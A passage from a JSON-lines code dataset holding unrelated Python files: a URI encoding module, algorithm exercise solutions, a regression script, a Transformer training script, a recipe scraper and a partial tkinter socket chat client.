_id_to_alias[i][0]\n import publicprize.auth.model\n alias = publicprize.auth.model.BivAlias.query.filter_by(\n biv_id=i,\n ).first()\n if alias:\n return URI(alias.alias_name)\n return URI(self)\n\n\nclass Index(int):\n \"\"\"The sequenced part of an Id\"\"\"\n def __new__(cls, biv_index):\n if isinstance(biv_index, cls):\n return biv_index\n bi = int(biv_index)\n if 0 < bi <= _MAX_INDEX:\n return super().__new__(cls, bi)\n werkzeug.exceptions.abort(404)\n\n\nclass Marker(int):\n \"\"\"The type part of the Id\"\"\"\n def __new__(cls, biv_marker):\n if isinstance(biv_marker, cls):\n return biv_marker\n bm = int(biv_marker)\n assert 0 < bm <= _MAX_MARKER, str(biv_marker) + ': range'\n return super().__new__(cls, bm)\n\n def to_biv_id(self, biv_index):\n \"Convert an index value to a biv_id\"\n return Id(self, Index(biv_index))\n\n\nclass URI(str):\n \"\"\"Parses and stores an encoded biv_uri or an alias\"\"\"\n def __new__(cls, biv_uri_or_id):\n if isinstance(biv_uri_or_id, cls):\n return biv_uri_or_id\n if isinstance(biv_uri_or_id, (decimal.Decimal, int)):\n biv_uri_or_id = Id(biv_uri_or_id)\n if isinstance(biv_uri_or_id, Id):\n self = super().__new__(cls, cls.__encode(biv_uri_or_id))\n self.__id = biv_uri_or_id\n return self\n bu = str(biv_uri_or_id)\n self = super().__new__(cls, bu)\n if bu[0] == _ENC_PREFIX:\n self.__id = cls.__decode(bu)\n elif bu in _alias_to_id:\n self.__id = _alias_to_id[bu]\n else:\n import publicprize.auth.model\n alias = publicprize.auth.model.BivAlias.query.filter_by(\n alias_name=bu\n ).first_or_404()\n self.__id = Id(alias.biv_id)\n return self\n\n @property\n def biv_id(self):\n \"\"\"Returns Id for this URI\"\"\"\n return self.__id\n\n @staticmethod\n def __decode(biv_uri):\n bu = biv_uri[1:]\n assert len(bu) >= _MARKER_ENC_LEN, biv_uri + ': too short'\n bm = Marker(_CONV.str2int(bu[-_MARKER_ENC_LEN:]))\n i = _CONV.str2int(bu[:-_MARKER_ENC_LEN])\n return bm.to_biv_id(i)\n\n @staticmethod\n def __encode(biv_id):\n bm = _CONV.int2str(biv_id.biv_marker).zfill(_MARKER_ENC_LEN)\n bi = _CONV.int2str(biv_id.biv_index)\n return _ENC_PREFIX + bi + bm\n\n\ndef load_obj(biv_uri):\n \"\"\"Loads the object identified by biv_uri\"\"\"\n if biv_uri is None or isinstance(biv_uri, str) and len(biv_uri) == 0:\n biv_uri = URI_FOR_NONE\n bi = URI(biv_uri).biv_id\n pp_t('biv_uri={} biv_id={}', [biv_uri, bi])\n if bi.biv_marker not in _marker_to_class:\n pp_t('biv_marker={}', [bi.biv_marker])\n werkzeug.exceptions.abort(404)\n return _marker_to_class[bi.biv_marker].load_biv_obj(bi)\n\n\ndef register_alias(uri, biv_id):\n \"\"\"Registers biv_id with non-encoded uri\"\"\"\n assert uri not in _alias_to_id, uri + ': exists'\n assert not uri[0] == _ENC_PREFIX, uri + ': encoded uri'\n bi = Id(biv_id)\n _alias_to_id[uri] = bi\n bu = URI(uri)\n if bi not in _id_to_alias:\n _id_to_alias[bi] = []\n _id_to_alias[bi].append(bu)\n return bu\n\n\ndef register_marker(biv_marker, cls):\n \"\"\"Registers a marker in a global table for a model, which can\n load_biv_obj\"\"\"\n biv_marker = Marker(biv_marker)\n assert ppi.class_has_classmethod(cls, 'load_biv_obj'), str(cls) \\\n + ': missing load_biv_obj method'\n assert biv_marker not in _marker_to_class, str(biv_marker) + ': exists'\n _marker_to_class[biv_marker] = cls\n return Marker(biv_marker)\n\n_CONV = numconv.NumConv(radix=62, alphabet=numconv.BASE62)\n_ENC_PREFIX = '_'\n_IDEMPOTENT_URI = None\n_MAX_ID = int(1e18) - 1\n_MAX_INDEX = _MAX_ID // MARKER_MODULUS\n# We reserve 900 and above for versioning and growth\n_MAX_MARKER = MARKER_MODULUS - 101\n_MARKER_ENC_LEN = len(_CONV.int2str(_MAX_MARKER))\n_marker_to_class = {}\n_alias_to_id = {}\n_id_to_alias = {}\n","repo_name":"biviosoftware/publicprize","sub_path":"publicprize/biv.py","file_name":"biv.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33383727151","text":"\"\"\"Get kth number\n\nurl: https://www.acmicpc.net/problem/1300\n\"\"\"\ndef kth_number(N, K):\n left, right = 1, K\n\n while left <= right:\n cnt = 0\n mid = (left + right) // 2\n\n for d in range(1, N+1):\n cnt += min(mid // d, N)\n\n if cnt < K:\n left = mid + 1\n else:\n ans = mid\n right = mid - 1\n\n return ans\n\n\nif __name__ == '__main__':\n N = int(input())\n K = int(input())\n print(kth_number(N, K))\n","repo_name":"shoark7/algorithm-with-python","sub_path":"problems_solving/baekjoon/no_1300_kth_number.py","file_name":"no_1300_kth_number.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"18223145388","text":"from typing import List\n\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n dictionary = {}\n for word in strs:\n sorted_word = ''.join(sorted(word))\n if sorted_word not in dictionary:\n dictionary[sorted_word] = [word]\n else:\n dictionary[sorted_word].append(word)\n return list(dictionary.values())\n\ndef main():\n strs = [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]\n print(Solution().groupAnagrams(strs))\n\nmain() ","repo_name":"TheArcus02/LeetCodeSolutions","sub_path":"groupAnagrams.py","file_name":"groupAnagrams.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32634750452","text":"# Multiple Linear Regression\n\n# Importing the libraries\nimport numpy as np\n# import matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import r2_score\n\n# Importing the dataset\ndataset = pd.read_csv('student-mat.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 9].values\n\n# Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder = LabelEncoder()\nX[:, 0] = labelencoder.fit_transform(X[:, 0])\nonehotencoder = OneHotEncoder(categorical_features = [0])\nX = onehotencoder.fit_transform(X).toarray()\n\n# dmy Var - trpap if they are highly correlated - use the dummy \n# X = X[:, 1:]\n# Splitting the dataset into the Training set and Test set\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n# Fitting Multiple Linear Regression to the Training set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n# Predicting the Test set results\ny_test_pred = regressor.predict(X_test)\ny_train_pred = regressor.predict(X_train)\n#print( \" this is the predicted output ******************************\")\n#print(y_pred)\n\n\n\n#print(\"this is the actual data\")\ndata =X_train[:,0:1]\n\nplt.plot(y_train, y_train_pred,'*r')\nplt.plot(y_test, y_test_pred, '*g')\nplt.figure()\n\nyTrainr2 = (r2_score(y_train, y_train_pred))\nYTest = (r2_score(y_test, y_test_pred))\n\n\n","repo_name":"rpasricha45/Federated-Learning-Research-NJIT","sub_path":"Experiments/Non Federated/multiple_linear_regression.py","file_name":"multiple_linear_regression.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75249548328","text":"\"\"\"Pipeline for training a Transformer model for neural machine translation. \n\"\"\"\nimport glob\nimport os\n\nimport tensorflow as tf\nfrom absl import app\nfrom absl import flags\n\nfrom commons import utils\nfrom commons import dataset\nfrom commons import tokenization\nfrom model import TransformerModel\nfrom model_runners import SequenceTransducerTrainer\n\n\nSUFFIX = '*.tfrecord'\n\nflags.DEFINE_string(\n 'data_dir', None, 'Path to the directory storing all TFRecord files (with '\n 'pattern *train*) for training.')\nflags.DEFINE_string(\n 'vocab_path', None, 'Path to the vocabulary file.')\nflags.DEFINE_string(\n 'model_dir', None, 'Path to the directory that checkpoint files will be '\n 'written to.')\n\nflags.DEFINE_integer(\n 'encoder_stack_size', 6, 'Num of layers in encoder stack.')\nflags.DEFINE_integer(\n 'decoder_stack_size', 6, 'Num of layers in decoder stack.')\nflags.DEFINE_integer(\n 'hidden_size', 512, 'The dimensionality of the embedding vector.')\nflags.DEFINE_integer(\n 'num_heads', 8, 'Num of attention heads.')\nflags.DEFINE_integer(\n 'filter_size', 2048, 'The depth of the intermediate dense layer of the'\n 'feed-forward sublayer.')\nflags.DEFINE_float(\n 'dropout_rate', 0.1, 'Dropout rate for the Dropout layers.')\n\nflags.DEFINE_integer(\n 'max_num_tokens', 4096, 'The maximum num of tokens in each batch.')\nflags.DEFINE_integer(\n 'max_length', 64, 'Source or target seqs longer than this will be filtered'\n ' out.')\nflags.DEFINE_integer(\n 'num_parallel_calls', 8, 'Num of TFRecord files to be processed '\n 'concurrently.')\n\nflags.DEFINE_float(\n 'learning_rate', 2.0, 'Base learning rate.')\nflags.DEFINE_float(\n 'learning_rate_warmup_steps', 16000, 'Number of warm-ups steps.')\nflags.DEFINE_float(\n 'optimizer_adam_beta1', 0.9, '`beta1` of Adam optimizer.')\nflags.DEFINE_float(\n 'optimizer_adam_beta2', 0.997, '`beta2` of Adam optimizer.')\nflags.DEFINE_float(\n 'optimizer_adam_epsilon', 1e-9, '`epsilon` of Adam optimizer.')\n\nflags.DEFINE_float(\n 'label_smoothing', 0.1, 'Amount of probability mass withheld for negative '\n 'classes.')\nflags.DEFINE_integer(\n 'num_steps', 100000, 'Num of training iterations (minibatches).')\nflags.DEFINE_integer(\n 'save_ckpt_per_steps', 5000, 'Every this num of steps to save checkpoint.')\n\n\nFLAGS = flags.FLAGS\n\ndef main(_): \n data_dir = FLAGS.data_dir\n vocab_path = FLAGS.vocab_path\n model_dir = FLAGS.model_dir\n\n encoder_stack_size = FLAGS.encoder_stack_size\n decoder_stack_size = FLAGS.decoder_stack_size\n hidden_size = FLAGS.hidden_size\n num_heads = FLAGS.num_heads\n filter_size = FLAGS.filter_size\n dropout_rate = FLAGS.dropout_rate\n\n max_num_tokens = FLAGS.max_num_tokens\n max_length = FLAGS.max_length\n num_parallel_calls = FLAGS.num_parallel_calls\n\n learning_rate = FLAGS.learning_rate\n learning_rate_warmup_steps = FLAGS.learning_rate_warmup_steps\n optimizer_adam_beta1 = FLAGS.optimizer_adam_beta1\n optimizer_adam_beta2 = FLAGS.optimizer_adam_beta2\n optimizer_adam_epsilon = FLAGS.optimizer_adam_epsilon \n\n label_smoothing = FLAGS.label_smoothing\n num_steps = FLAGS.num_steps\n save_ckpt_per_steps = FLAGS.save_ckpt_per_steps\n\n # transformer model\n subtokenizer = tokenization.restore_subtokenizer_from_vocab_files(vocab_path)\n vocab_size = subtokenizer.vocab_size \n model = TransformerModel(vocab_size=vocab_size,\n encoder_stack_size=encoder_stack_size,\n decoder_stack_size=decoder_stack_size,\n hidden_size=hidden_size, \n num_heads=num_heads,\n filter_size=filter_size,\n dropout_rate=dropout_rate)\n\n # training dataset\n builder = dataset.DynamicBatchDatasetBuilder(\n max_num_tokens, True, max_length, num_parallel_calls)\n filenames = sorted(glob.glob(os.path.join(data_dir, SUFFIX)))\n train_ds = builder.build_dataset(filenames)\n \n # learning rate and optimizer\n optimizer = tf.keras.optimizers.Adam(\n utils.LearningRateSchedule(learning_rate,\n hidden_size,\n learning_rate_warmup_steps),\n optimizer_adam_beta1, \n optimizer_adam_beta2, \n epsilon=optimizer_adam_epsilon)\n\n # checkpoint\n ckpt = tf.train.Checkpoint(model=model, optimizer=optimizer)\n\n # build trainer and start training\n trainer = SequenceTransducerTrainer(model, label_smoothing)\n trainer.train(\n train_ds, optimizer, ckpt, model_dir, num_steps, save_ckpt_per_steps)\n\n\nif __name__ == '__main__':\n flags.mark_flag_as_required('data_dir')\n flags.mark_flag_as_required('model_dir')\n flags.mark_flag_as_required('vocab_path')\n app.run(main)\n","repo_name":"chao-ji/tf-transformer","sub_path":"run_trainer.py","file_name":"run_trainer.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"71734581287","text":"from tkinter import *\nimport tkinter.messagebox as box\nwindow = Tk()\nwindow.title('Buffer Blaster')\nframe = Frame(window)\nlabel = Label(frame, text=\"buffer pushed to server\")\nlabel2 = Label(frame, text=\"buffer pulled from debugger\")\nentry = Entry(frame)\nentry2 = Entry(frame)\ndef dialog():\n str1 = entry.get()\n str1 = str1.replace('x', '')\n str1 = str1.replace(\"\\\\\", '')\n str1 = str1.upper()\n str2 = entry2.get() \n\n result1 = ''\n result2 = ''\n\n maxlen=len(str2) if len(str1) target + distance:\n break\n if fabs(target - sigma) < distance:\n distance = fabs(target - sigma)\n closest = sigma\n closest_n = n\n closest_m = m\n\n mat[n].append(sigma_n_m(n, m))\n\n\n print(\"closest to \", target, \" is (\", closest_n, \", \", closest_m, \") -> \", closest, \"; with a distance of \", distance)\n print(\"the area of the rectangle is -> \", closest_n * closest_m)\n print(\"done in: \", time.time() - t1, \" seconds.\")\n","repo_name":"Tyzeppelin/Project-Euler","sub_path":"problem85/problem85_v2.py","file_name":"problem85_v2.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16151810422","text":"import re\n\nvalid_phone = r'\\d\\d\\d/\\d+-\\d+'\n\nprint('Unesite vasu broj telefona: ')\nuser_phone = input()\n\nif re.match(valid_phone, user_phone):\n print('Uneli ste broj u ispravnom formatu.')\nelse:\n print('Broj koji ste uneli nije u ispravnom formatu!')\n","repo_name":"DavorKandic/py_regex_practice","sub_path":"is_valid_serbian_phone.py","file_name":"is_valid_serbian_phone.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2882936253","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom scraper import Scraper, get_text\n\n\ndef _get_recipe_page(recipe):\n title_element = recipe.find(\"h2\", class_=\"entry-title\")\n link = title_element.find(\"a\", class_=\"entry-title-link\")\n\n recipe_page = requests.get(link[\"href\"])\n recipe_soup = BeautifulSoup(recipe_page.content, \"html.parser\")\n recipe_results = recipe_soup.find(\"div\", class_=\"wprm-recipe-the-chunky-chef\")\n\n title_text = get_text(title_element)\n\n print(title_text)\n\n return [{\"title\": title_text, \"link\": link[\"href\"]}, recipe_results]\n\n\ndef find_ingredient_info(ingredient):\n amount = ingredient.find(\"span\", class_=\"wprm-recipe-ingredient-amount\")\n unit = ingredient.find(\"span\", class_=\"wprm-recipe-ingredient-unit\")\n name = ingredient.find(\"span\", class_=\"wprm-recipe-ingredient-name\")\n notes = ingredient.find(\"span\", class_=\"wprm-recipe-ingredient-notes\")\n\n return {\n \"amount\": get_text(amount),\n \"unit\": get_text(unit),\n \"name\": get_text(name),\n \"notes\": get_text(notes),\n }\n\n\ndef find_ingredient_group_info(group):\n group_title = group.find(\"h4\", class_=\"wprm-recipe-group-name\")\n group_ingredients_raw = group.find_all(\"li\", \"wprm-recipe-ingredient\")\n group_ingredients = list(map(find_ingredient_info, group_ingredients_raw))\n\n return {\"title\": get_text(group_title), \"ingredients\": group_ingredients}\n\n\ndef find_instruction_group_info(group):\n title = get_text(group.find(\"h4\", \"wprm-recipe-instruction-group-name\"))\n instructions = group.find_all(\"div\", \"wprm-recipe-instruction-text\")\n return {\n \"title\": title,\n \"instructions\": list(\n map(lambda instruction: get_text(instruction), instructions)\n ),\n }\n\n\nclass TheChunkyChefScraper(Scraper):\n @property\n def url(self):\n return \"https://www.thechunkychef.com/recipe-index/\"\n\n def should_continue(self, page_index):\n if page_index == 1:\n return True\n\n page = requests.get(self.url + \"page/\" + str(page_index - 1))\n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(id=\"genesis-content\")\n next_button = results.find(\"li\", class_=\"pagination-next\")\n\n return bool(next_button)\n\n def get_recipes(self, page_index):\n page = requests.get(self.url + \"page/\" + str(page_index))\n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(id=\"genesis-content\")\n recipe_blocks = results.find_all(\"article\", class_=\"post\")\n\n zipped_list = list(map(_get_recipe_page, recipe_blocks))\n\n self.recipes, self.raw_recipes = zip(*zipped_list)\n\n return self\n\n def get_description(self, recipe):\n recipe_description = get_text(recipe.find(\"div\", class_=\"wprm-recipe-summary\"))\n\n return {\"description\": recipe_description}\n\n def get_author(self, recipe):\n recipe_author_container = recipe.find(\"span\", class_=\"wprm-recipe-author\")\n\n if not recipe_author_container:\n return {\"author\": \"The Chunky Chef\"}\n\n author_link = recipe_author_container.find(\"a\", recursive=False)\n\n if author_link:\n # print({\"author\": get_text(author_link)})\n return {\"author\": get_text(author_link)}\n\n # print({\"author\": get_text(recipe_author_container)})\n return {\"author\": get_text(recipe_author_container)}\n\n def get_image_link(self, recipe):\n recipe_image_container = recipe.find(\"div\", \"wprm-recipe-image\")\n recipe_image = recipe_image_container.find(\"img\", recursive=False)\n recipe_image_link = None\n\n if recipe_image:\n try:\n recipe_image_link = recipe_image[\"data-src\"]\n except KeyError:\n pass\n\n return {\"image-link\": recipe_image_link}\n\n def get_servings(self, recipe):\n recipe_servings = get_text(recipe.find(\"span\", class_=\"wprm-recipe-servings\"))\n\n return {\"servings\": recipe_servings}\n\n def get_prep_time(self, recipe):\n recipe_prep_time_minutes = get_text(\n recipe.find(\"span\", class_=\"wprm-recipe-prep_time-minutes\")\n )\n recipe_prep_time_hours = get_text(\n recipe.find(\"span\", class_=\"wprm-recipe-prep_time-hours\")\n )\n\n time = 0\n\n if recipe_prep_time_hours:\n time += float(recipe_prep_time_hours) * 60\n\n if recipe_prep_time_minutes:\n time += float(recipe_prep_time_minutes)\n\n return {\"prep-time\": time}\n\n def get_cook_time(self, recipe):\n recipe_cook_time_minutes = get_text(\n recipe.find(\"span\", class_=\"wprm-recipe-cook_time-minutes\")\n )\n recipe_cook_time_hours = get_text(\n recipe.find(\"span\", class_=\"wprm-recipe-cook_time-hours\")\n )\n\n time = 0\n\n if recipe_cook_time_hours:\n time += float(recipe_cook_time_hours) * 60\n\n if recipe_cook_time_minutes:\n time += float(recipe_cook_time_minutes)\n\n return {\"cook-time\": time}\n\n def get_ingredient_groups(self, recipe):\n ingredient_groups_raw = recipe.find_all(\n \"div\", class_=\"wprm-recipe-ingredient-group\"\n )\n ingredient_groups = list(map(find_ingredient_group_info, ingredient_groups_raw))\n\n return {\"ingredient_groups\": ingredient_groups}\n\n def get_instruction_groups(self, recipe):\n recipe_instruction_groups_raw = recipe.find_all(\n \"div\", \"wprm-recipe-instruction-group\"\n )\n recipe_instruction_groups = list(\n map(find_instruction_group_info, recipe_instruction_groups_raw)\n )\n\n return {\"instruction_groups\": recipe_instruction_groups}\n","repo_name":"learning-curv/recipe-scraper","sub_path":"the_chunky_chef_scraper.py","file_name":"the_chunky_chef_scraper.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27043090554","text":"# import all the required modules\nimport socket\nimport threading\nimport json\nfrom datetime import datetime\nfrom tkinter import *\nfrom tkinter import font\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\nSERVER = 'localhost'\nPORT = 8000\nFORMAT = \"utf-8\"\nADDRESS = (SERVER, PORT)\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(ADDRESS)\n\n\nclass GUI:\n # constructor method\n def __init__(self):\n # Program Variables\n self.isStart = True\n self.client_list = []\n self.client_chats = {}\n self.create_group_list = []\n self.join_group_list = []\n self.join_group_chats = {}\n self.username = \"None\"\n self.current_client_chat = \"None\"\n self.current_group_chat = \"None\"\n self.current_window = \"login\"\n self.is_group = False\n\n # Make root Window\n self.root = Tk()\n\n # Create Login Window\n self.create_root_window()\n self.create_home_window()\n self.create_login_window()\n # self.login.withdraw()\n self.home.withdraw()\n self.root.withdraw()\n\n # start receive thread message\n self.receive_thread = threading.Thread(target=self.receive)\n self.receive_thread.start()\n\n # bind a key to call the same\n self.root.mainloop()\n\n # Init Window\n def create_login_window(self):\n # login window\n self.login = Toplevel()\n self.login.title(\"CHAT APP\")\n self.login.resizable(width=False, height=False)\n self.login.geometry(\"400x300\")\n # create a Label\n self.lbl_login = Label(self.login,\n text=\"Please login to continue\",\n justify=CENTER,\n font=\"Helvetica 14 bold\")\n self.lbl_login.place(relheight=0.15, relx=0.2, rely=0.07)\n\n # create a Label\n self.lbl_login_name = Label(self.login,\n text=\"Name: \",\n font=\"Helvetica 12\")\n self.lbl_login_name.place(relheight=0.2,\n relx=0.1,\n rely=0.2)\n\n # create a entry box for typing the message\n self.ent_login_username = Entry(self.login, font=\"Helvetica 14\")\n self.ent_login_username.place(relwidth=0.4,\n relheight=0.12,\n relx=0.35,\n rely=0.2)\n\n # set the focus to entry login\n self.ent_login_username.focus()\n\n # for error message\n self.lbl_login_error = Label(self.login,\n text=\"\",\n justify=CENTER,\n fg=\"red\",\n font=\"Helvetica 8 bold\")\n # create a Continue Button\n self.btn_login_summit_username = Button(self.login,\n text=\"CONTINUE\",\n font=\"Helvetica 14 bold\",\n command=lambda: self.on_click(\"startup\", type=\"username\", data=self.ent_login_username.get()))\n self.btn_login_summit_username.place(relx=0.4,\n rely=0.55)\n\n self.login.protocol(\"WM_DELETE_WINDOW\", self.on_window_close)\n\n def create_home_window(self):\n # to show chat window\n self.home = Toplevel()\n self.home.title(\"CHAT APP\")\n self.home.resizable(width=False,\n height=False)\n self.home.geometry(\"400x300\")\n\n # create a Label\n self.lbl_home_head = Label(self.home,\n text=\"Username : \"+self.username,\n font=\"Helvetica 13 bold\",\n pady=3)\n self.lbl_home_head.place(relwidth=1)\n\n # create a Label\n self.lbl_home = Label(self.home,\n text=\"Select Chatroom\",\n justify=CENTER,\n font=\"Helvetica 14 bold\")\n self.lbl_home.place(relheight=0.15, relx=0.3, rely=0.07)\n\n # create a Label\n self.lbl_home_clients = Label(self.home,\n text=\"Clients : \",\n font=\"Helvetica 12\")\n self.lbl_home_clients.place(relheight=0.2,\n relx=0.2,\n rely=0.2)\n\n # create client option frame\n self.frame_home_clients = Frame(\n self.home, width=100, height=100)\n self.frame_home_clients.place(relwidth=0.5, rely=0.2, relx=0.35)\n self.lbl_home_client_chat = Label(self.frame_home_clients,\n text=\"Select Client Room\",\n font=\"Helvetica 10\",\n pady=3)\n self.lbl_home_client_chat.pack()\n self.txt_client_var = StringVar(self.home)\n self.combobox_home_client = ttk.Combobox(self.frame_home_clients,\n values=self.client_list, textvariable=self.txt_client_var, state='readonly', postcommand=lambda: self.change_is_group(False))\n self.combobox_home_client.pack(pady=5)\n\n # create a group Label\n self.lbl_home_groups = Label(self.home,\n text=\"Groups : \",\n font=\"Helvetica 12\")\n self.lbl_home_groups.place(relheight=0.2,\n relx=0.2,\n rely=0.4)\n\n # create client option frame\n self.frame_home_groups = Frame(\n self.home, width=100, height=100)\n self.frame_home_groups.place(relwidth=0.5, rely=0.4, relx=0.35)\n self.lbl_home_group_chat = Label(self.frame_home_groups,\n text=\"Select Group Room\",\n font=\"Helvetica 10\",\n pady=3)\n self.lbl_home_group_chat.pack()\n self.txt_group_var = StringVar(self.home)\n self.combobox_home_group = ttk.Combobox(self.frame_home_groups,\n values=self.create_group_list, textvariable=self.txt_group_var, postcommand=lambda: self.change_is_group(True))\n self.combobox_home_group.pack(pady=5)\n\n # create a Continue Button\n self.btn_home_summit_enter = Button(self.home,\n text=\"ENTER\",\n font=\"Helvetica 14 bold\",\n command=lambda: self.on_click(\"startup\", type=\"openchat\"))\n self.btn_home_summit_enter.place(relx=0.4,\n rely=0.8)\n\n self.home.protocol(\"WM_DELETE_WINDOW\", self.on_window_close)\n\n def create_root_window(self):\n\n # to show chat window\n self.root.title(\"CHAT APP\")\n self.root.resizable(width=False,\n height=False)\n self.root.geometry(\"470x650\")\n self.root.configure(bg=\"#17202A\")\n\n # create a Label\n self.lbl_root_head = Label(self.root,\n bg=\"#292F3F\",\n fg=\"#FFFFFF\",\n text=\"Username : \"+self.username,\n font=\"Helvetica 14 bold\",\n pady=3,\n height=2)\n self.lbl_root_head.place(relwidth=1)\n\n self.lbl_root_sub_head = Label(self.root,\n bg=\"#292F3F\",\n fg=\"#FFFFFF\",\n text=\"Chat room with \"+self.current_client_chat,\n font=\"Helvetica 12 bold\",\n pady=3)\n self.lbl_root_sub_head.place(relwidth=1, rely=0.08)\n\n # Create button\n self.btn_root_back = Button(self.root,\n text=\"Back\",\n font=\"Helvetica 13\",\n command=lambda: self.on_click(\"startup\", type=\"backtohome\"))\n self.btn_root_back.place(relwidth=0.2, rely=0.02, relx=0.02)\n # create a text box\n self.txt_root_message = Text(self.root,\n height=2,\n width=20,\n bg=\"#373E4E\",\n fg=\"#FFFFFF\",\n font=\"Helvetica 13\",\n padx=15,\n pady=15,\n cursor=\"arrow\",\n state=DISABLED)\n self.txt_root_message.place(relheight=0.7,\n relwidth=0.9,\n relx=0.05,\n rely=0.126)\n\n # create a scroll bar\n scrollbar = Scrollbar(self.txt_root_message,\n command=self.txt_root_message.yview)\n scrollbar.place(relheight=0.974,\n relx=1.5)\n\n # create a Label\n self.lbl_root_bottom = Label(self.root,\n bg=\"#ABB2B9\",\n height=80\n )\n self.lbl_root_bottom.place(relwidth=1, rely=0.85)\n\n # create a entry box for typing the message\n self.ent_root_message = Entry(self.lbl_root_bottom,\n bg=\"#2C3E50\",\n fg=\"#EAECEE\",\n font=\"Helvetica 13\")\n self.ent_root_message.place(relwidth=0.74,\n relheight=0.06,\n rely=0.008,\n relx=0.011)\n self.ent_root_message.focus()\n\n # create a Send Button\n self.btn_root_message = Button(self.lbl_root_bottom,\n text=\"Send\",\n font=\"Helvetica 10 bold\",\n width=20,\n bg=\"#ABB2B9\",\n command=lambda: self.on_click(\"sending\", type=\"direct_message\", data=self.ent_root_message.get()))\n self.btn_root_message.place(relx=0.77,\n rely=0.008,\n relheight=0.06,\n relwidth=0.22)\n\n # function to start the thread for sending messages\n self.txt_root_message.config(state=DISABLED)\n\n self.root.protocol(\"WM_DELETE_WINDOW\", self.on_window_close)\n\n # Handle On Window Close\n def on_window_close(self):\n if messagebox.askokcancel(\"Quit\", \"Do you want to quit?\"):\n self.isStart = False\n self.login.destroy()\n self.home.destroy()\n self.root.destroy()\n client.close()\n\n # Main method\n def on_click(self, action, type=None, data=None):\n if action == \"startup\":\n if type == 'username':\n self.handle_send_update_username(data)\n elif type == 'openchat':\n if self.is_group:\n self.current_group_chat = self.combobox_home_group.get()\n else:\n self.current_client_chat = self.combobox_home_client.get()\n self.handle_open_chat(self.is_group)\n elif type == 'backtohome':\n self.handle_back_to_home(self.is_group)\n elif action == \"sending\":\n self.handle_send_message(data, self.is_group)\n\n # handle send message to server\n def handle_send_update_username(self, username):\n self.username = username\n message = json.dumps({\n \"type\": \"username\",\n \"data\": username\n })\n client.send(message.encode())\n # Fill here\n self.lbl_root_head.config(text=\"Username : \"+username)\n self.lbl_home_head.config(text=\"Username : \"+username)\n self.username = username\n\n def handle_open_chat(self, is_group):\n # re-window the chat window\n self.home.withdraw()\n self.root.deiconify()\n\n # Attempt swap message\n if is_group:\n # Check that if group is existed\n if self.combobox_home_group.get() not in self.create_group_list:\n self.handle_send_create_group(self.combobox_home_group.get())\n # Check that if group is joined\n if self.combobox_home_group.get() not in self.join_group_list:\n self.handle_send_join_group(self.combobox_home_group.get())\n self.swap_stored_chat(self.current_group_chat,\n self.combobox_home_group.get(), True)\n else:\n self.swap_stored_chat(self.current_client_chat,\n self.combobox_home_client.get(), False)\n\n def handle_back_to_home(self, is_group):\n self.root.withdraw()\n self.txt_root_message.delete(END)\n if is_group:\n self.join_group_chats[self.current_group_chat] = self.txt_root_message.get(\n \"1.0\", 'end-1c')\n self.current_group_chat = None\n else:\n self.client_chats[self.current_client_chat] = self.txt_root_message.get(\n \"1.0\", 'end-1c')\n self.current_client_chat = None\n self.home.deiconify()\n\n def handle_send_message(self, message, is_group):\n if (is_group):\n self.handle_send_group_message(\n self.current_group_chat, message)\n else:\n self.handle_send_direct_message(self.current_client_chat, message)\n\n def handle_send_direct_message(self, recipient, message):\n self.ent_root_message.delete(0, END)\n send_message = json.dumps({\n \"type\": \"direct_message\",\n \"recipient\": recipient,\n \"data\": message\n })\n client.send(send_message.encode())\n self.insert_message(self.username, message, True)\n\n def handle_send_create_group(self, group_name):\n message = json.dumps({\n \"type\": \"create\",\n \"data\": group_name\n })\n client.send(message.encode())\n\n def handle_send_join_group(self, group_name):\n self.join_group_chats[self.current_group_chat] = f\"Welcome to {group_name}\"+\"\\n\\n\"\n message = json.dumps({\n \"type\": \"join\",\n \"data\": group_name\n })\n client.send(message.encode())\n\n def handle_send_group_message(self, group_name, message):\n send_message = json.dumps({\n \"type\": \"group_message\",\n \"group\": group_name,\n \"data\": message\n })\n client.send(send_message.encode())\n self.insert_message(self.username, message, True)\n\n def on_receive(self, response_object):\n print(f'Object from server: {response_object}')\n respond_type = response_object[\"type\"]\n if (respond_type == \"users\" or respond_type == \"username\"):\n self.handle_receive_update_username(response_object)\n elif respond_type == \"direct_message\":\n self.handle_receive_direct_message(response_object)\n elif respond_type == \"group_message\":\n self.handle_receive_group_message(response_object)\n elif respond_type == \"groups\":\n self.handle_receive_groups(response_object)\n\n # handle receive message from server\n def handle_receive_update_username(self, response_object):\n if (response_object[\"type\"] == \"username\" and self.current_window == \"login\"):\n 